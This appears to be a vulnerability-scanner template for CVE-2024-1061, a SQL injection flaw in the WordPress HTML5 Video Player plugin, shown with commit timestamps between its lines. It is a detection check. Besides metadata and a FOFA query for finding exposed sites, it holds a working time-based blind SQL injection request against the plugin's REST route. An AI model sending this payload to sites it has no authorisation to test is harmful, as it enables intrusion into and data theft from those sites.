2024-01-31 09:51:49 +00:00
id : CVE-2024-1061
info :
2024-01-31 11:29:04 +00:00
name : WordPress HTML5 Video Player - SQL Injection
2024-01-31 09:51:49 +00:00
author : xxcdd
severity : high
description : |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
reference :
- https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player
2024-01-31 11:29:04 +00:00
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
2024-03-04 08:20:22 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation : |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
2024-01-31 09:51:49 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.6
cve-id : CVE-2024-1061
cwe-id : CWE-89
metadata :
2024-01-31 11:29:04 +00:00
verified : true
2024-03-04 08:20:22 +00:00
fofa-query : "\"wordpress\" && body=\"html5-video-player\""
max-request : 1
2024-01-31 11:29:04 +00:00
tags : cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
2024-01-31 09:51:49 +00:00
http :
2024-01-31 11:29:04 +00:00
- method : GET
path :
- "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
2024-01-31 09:51:49 +00:00
matchers :
- type : dsl
dsl :
2024-01-31 11:29:04 +00:00
- 'duration>=6'
- 'contains(header, "application/json")'
2024-01-31 11:32:41 +00:00
- 'contains_all(body, "created_at", "video_id")'
2024-01-31 09:51:49 +00:00
condition : and
2024-03-04 09:35:31 +00:00
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950
